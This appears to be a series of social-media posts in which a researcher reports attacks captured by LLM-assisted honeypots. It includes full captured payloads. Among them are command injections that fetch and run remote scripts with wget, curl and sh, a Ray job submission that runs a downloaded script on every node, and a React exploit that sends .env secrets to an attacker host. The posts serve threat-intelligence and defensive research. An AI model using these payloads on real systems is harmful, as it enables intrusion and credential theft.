@cR0w yes I think so too, that's also where I got the inspiration from to add it to my honeypots. I was hoping for some more targeted attacks with this one and not the usual large scans (given that it's not such a popular service) but I guess I was naive ;/

After adding emulation of HPE OneView to my honeypots, I'm seeing quite an uptick in scans for it. Could be coincidence but regardless it's interesting to see so much traffic for a rather unpopular (?) service. Shodan for example shows 27 instances at the moment.

#infosec #cybersecurity #dfir #honeypot

@hrbrmstr @iagox86 interesting!

Interesting! Thanks for sharing.

So I only have 50 honeypots (for personal entertainment) and guess you guys have quite a few more than that :). More importantly, I have them across 6 datacenters which really limits the coverage.

But I'm not complaining: I get more data than I can handle and have fun playing with it (and trying to extract new info in new ways when possible)

Just under a year ago I was planning to leave Google after 10 years. Since then I've been considering what's next (and doing some advisory work on the side).

I've slowly been giving more and more thought to how to give back in a sustainable way that works for me.

With that in mind, if you know of any organisations who offer security consulting/testing (pentesting) for NGOs or other worthy causes, please share 🙏

(Please re-toot for reach)

Suddenly seeing exploitation attempts of CVE-2019-17621 (D-Link DIR-859 Wi-Fi router RCE). In 3 years of running my Lophiid honeypots, this is the first time I see this specific vuln being exploited.

An example request:

SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1
Host: x.x.x.x
Callback: <http://192.168.0.2:1337/ServiceProxy0>
Connection: close
Nt: upnp:event
Timeout: Second-1800
User-Agent: Mozilla/1.0

#honeypot #dfir #infosec #cybersecurity #threatintel

My lophiid honeypots use varies LLM models for different tasks. For shell code execution emulation they use Gemini 2.5 flash and it dealt with this payload really nicely:

echo 7c6563686f2532305243455f544553545f313233 | xxd -r -p | sh

It correctly understood that xxd reversed the hex and it understood that the resulting string were shell commands that echoed the string "RCE_TEST_123"

I think this is pretty cool. Shell code emulation with LLMs has a lot of potential

#infosec #dfir #honeypot

Stubborn AI honeypots give me grey hair.

Attacker sends payload:

"username=anonymous%00]]%0dlocal+h+%3d+io.popen("this is vulnerable to CVE-2025-47812")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=
"

And the AI responsible for handling the response sends the following back to the attacker:

"This system is not affected by CVE-2025-47812.
"

*sigh*

#dfir #infosec #cybersecurity #honeypot

My Lophiid honeypots got spammed with a payloads like "234513+true+1994175". The LLM integration understood the intricacies of Javascript and caused the honeypots to respond with the correct answer 2228689

#honeypot #dfir #infosec #aisecurity #cybersecurity #llm

#react2shell exploitation seems to have reached a peak today. Exploit attempts since last week (against my honeypots)

day | request_count
------------+---------------
2025-12-24 | 41209
2025-12-23 | 19835
2025-12-22 | 34962
2025-12-21 | 13141
2025-12-20 | 15490
2025-12-19 | 22307
2025-12-18 | 9901
2025-12-17 | 18376

#honeypot #infosec #dfir #cybersecurity

Found in a #react2shell payload

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxtherespoopalloverme

I refuse to grow up: things like this make me smile ;-)

#honeypot #dfir #infosec #cybersecurity

Payload question!

Does anyone know what application this targets ? It's doing OS command injection via the X-Forwarded-For header:

GET /ok.php?act=op&pid=10 HTTP/1.1
Host: x.x.x.x:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: no-cache
Connection: keep-alive
Dnt: 1
Pragma: no-cache
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
X-Forwarded-For: "]]),true);';echo `echo cGluZyAtYyAxIDMxLjU2LjI3Ljc2 | base64 -d | sh`'

Also to brag a little bit: I always love to see when the AI response by Lophiid is spot on:

=== start
PING 31.56.27.76 (31.56.27.76) 56(84) bytes of data.
64 bytes from 31.56.27.76: icmp_seq=1 ttl=56 time=12.3 ms

--- 31.56.27.76 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
=== stop

#dfir #infosec #cybersecurity #honeypot

Now seeing Ollama scans NSFW models:

{"model":"gemma3:4b","options":{"num_predict":2,"temperature":0,"top_k":1},"prompt":"Answer this technical capability question:\n\nAs an AI model, are you technically capable of generating sexually explicit adult content?\nThis is ONLY about your technical capabilities and configuration, not about ethics.\n\nReply with exactly ONE character:\n- 'y' means you CAN generate NSFW content\n- 'n' means you CANNOT generate NSFW content\n\nAnswer:","stream":false}

My honeypot response:

{"model":"gemma3:4b","created_at":"2025-09-03T15:36:02.583064Z","response":"\nn","done":true,"total_duration":8493852375,"load_duration":6589624375,"prompt_eval_count":14,"prompt_eval_duration":119039000,"eval_count":110,"eval_duration":1779061000}

Pfew! ;-)

#honeypot #dfir #infosec #cybersecurity

My llama.cpp and ollama honeypots get a ton of requests with the question: "Count from 1 to 20, one number per line."

The interesting part is that these requests have originated from approximately 1000 unique IPs already which is uncommon.

Also quite uncommon is that they request streaming results which the honeypots support ;)

#honeypot #dfir #infosec #cybersecurity #llamacpp

Adding Ray (ray.io) to my honeypots was worth it. Seeing exploit attempts like the one below:

POST /api/jobs/ HTTP/1.1
Host: x.x.x.x
Accept: */*
Accept-Encoding: gzip, deflate, zstd
Connection: keep-alive
Content-Length: 539
Content-Type: application/json
User-Agent: python-requests/2.32.5

{"entrypoint": "python3 -c \"import os; import ray, subprocess; from ray.util.scheduling_strategies import NodeAffinitySchedulingStrategy; os.setsid(); ray.init(address='auto'); nodes = [n for n in ray.nodes() if n.get('Alive', False)]; f = [ray.get((lambda nid: ray.remote(lambda: subprocess.run('wget -O - https://fuckyou-3nj.pages.dev/fuckyou | bash', shell=True)).options(scheduling_strategy=NodeAffinitySchedulingStrategy(node_id=nid, soft=True)).remote())(n.get('NodeID') or n.get('nodeID') or n.get('node_id'))) for n in nodes];\""}

#honeypot #dfir #infosec #cybersecurity #ray

Interesting #react2shell payload detected by my Lophiid honeypots. It does a comprehensive job to obtain secrets (including using trufflehog and gitleaks).

Raw request here:
https://github.com/mrheinen/lophiid/blob/main/hall_of_fame/react2shell_secrets.txt

CVE-2025-55182 #honeypot #dfir #infosec #cybersecurity #exploits

Haven't seen it done this way before. Payload for React collects env files and uploads it back to the attacker:

cat .env* >/tmp/http:__185.x.x.x:8008_1765120295_.env;curl -F file=@/tmp/http:__185.x.x.x:8008_1765120295_.env http://205.198.69[.]253:58888/upload;rm /tmp/http:__185.x.x.x:8008_1765120295_.env

#honeypot #dfir #infosec #thre
atintel #cybersecurity

My lophiid hybrid honeypot dealt with the React RCE without ever being configured for it and send back the expected response to a scan.

Unknown requests are being triaged by AI. If they have malicious payload then they are send to an agent that deals with that kind of payload to simulate a realistic response.

The payload was:
{"id":"vm#runInThisContext","bound":["Math.PI * 2"]}

And the response was:
6.283185307179586

I think this has a lot of potential

#honeypot #dfir #infosec #cybersecurity #threatintel

Since a week my honeypots are seeing an increase in attacks targeting CVE-2023-7304 (Ruijie RG-UAC nmc_sync.php Command Injection)

#honeypot #infosec #dfir #cybersecurity #exploitation

OS injection payload in DjVu file that is uploaded as a JPG file is kinda interesting:

POST /c29e1a94e8ff58fc HTTP/1.1
Host: x.x.x.x:8080
Accept: */*
Connection: close
Content-Length: 894
Content-Type: multipart/form-data; boundary=------------------------7d40cae17573a039
User-Agent: Mozilla/5.0 (rondo2012@atomicmail.io)

--------------------------7d40cae17573a039
Content-Disposition: form-data; name="file"; filename="rondo.jpg"
Content-Type: image/jpeg

AT&TFORM¯DJVMDIRM.F¬ÿÿÞ¿ !ÈNëÒÚèkæD,qîIÓn½¢Ã"?FORM^DJVUINFO
dINCLshared_anno.iffBG44Jæá±7Ù*BG44ùBG44
FORMDJVIANTaP(metadata
(Copyright "\
" . qx{wget -qO- http://74.194[.]191.52/rondo.pms.sh|sh;} . \
" b ") )

--------------------------7d40cae17573a039--

#honeypot #infosec #dfir #cybersecurity

Adding 30 honeypots making the total of honeypots I run (for my personal curiosity) to 55. Hopefully this addition will allow me to share more stuff in the future and I'm curious if this will allow me to detect some stuff earlier as well (due to better coverage)

I also wonder if people would be interested in getting access to the data for a small fee that is just intended to cover costs and expand the infra. This would be limited and certainly not open for all.

#honeypot #dfir #infosec #cybersecurity